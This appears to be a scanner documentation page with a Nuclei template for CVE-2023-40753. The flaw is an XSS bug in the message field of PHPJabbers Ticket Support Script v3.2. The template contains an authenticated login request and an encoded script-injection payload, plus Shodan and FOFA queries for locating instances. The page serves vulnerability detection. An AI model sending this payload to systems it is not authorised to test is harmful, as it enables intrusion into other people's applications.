PHPJabbers Ticket Support Script v3.2 - Cross-Site Scripting
ID: CVE-2023-40753
Severity: medium
Author: ritikchaddha
Tags: cve,cve2023,phpjabbers,ticket-support-script,xss,authenticated
Description
Section titled “Description”There is a Cross Site Scripting (XSS) vulnerability in the message parameter of index.php in PHPJabbers Ticket Support Script v3.2.
YAML Source
Section titled “YAML Source”id: CVE-2023-40753
info: name: PHPJabbers Ticket Support Script v3.2 - Cross-Site Scripting author: ritikchaddha severity: medium description: | There is a Cross Site Scripting (XSS) vulnerability in the message parameter of index.php in PHPJabbers Ticket Support Script v3.2. reference: - https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f - https://nvd.nist.gov/vuln/detail/CVE-2023-40753 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-40753 cwe-id: CWE-79 cpe: cpe:2.3:a:phpjabbers:ticket_support_script:3.2:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"PHPJabbers" fofa-query: body="PHPJabbers" vendor: phpjabbers product: ticket_support_script tags: cve,cve2023,phpjabbers,ticket-support-script,xss,authenticated
http: - raw: - | POST /index.php?controller=pjBase&action=pjActionLogin HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
login_user=1&login_email={{username}}&login_password={{password}}&login_captcha=
- | GET /notification_create=1&type=NewTicket&department_id%5B%5D=2&user_id%5B%5D=1&i18n%5B1%5D%5Bsubject%5D=a&i18n%5B1%5D%5Bmessage%5D=%3C%2Ftextarea%3E%3CscrIpt%3Ealert(document.domain)%3B%3C%2FscRipt%3E%3Ctextarea%3E HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body_2 words: - "</textarea><scrIpt>alert(document.domain);</scRipt><textarea>" - "Subject" - "Recipient users" condition: and
- type: word part: content_type_2 words: - text/html
- type: status status: - 200# digest: 4a0a0047304502207e1da6f4893ce656b1d1ac73252479fde837652a8a9203b0ed527bf02e002cde0221009a9d480800d38b14cb5f4b33d24d862c1d2bd4b69b7a96090e7a7af356743e2b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-40753.yaml"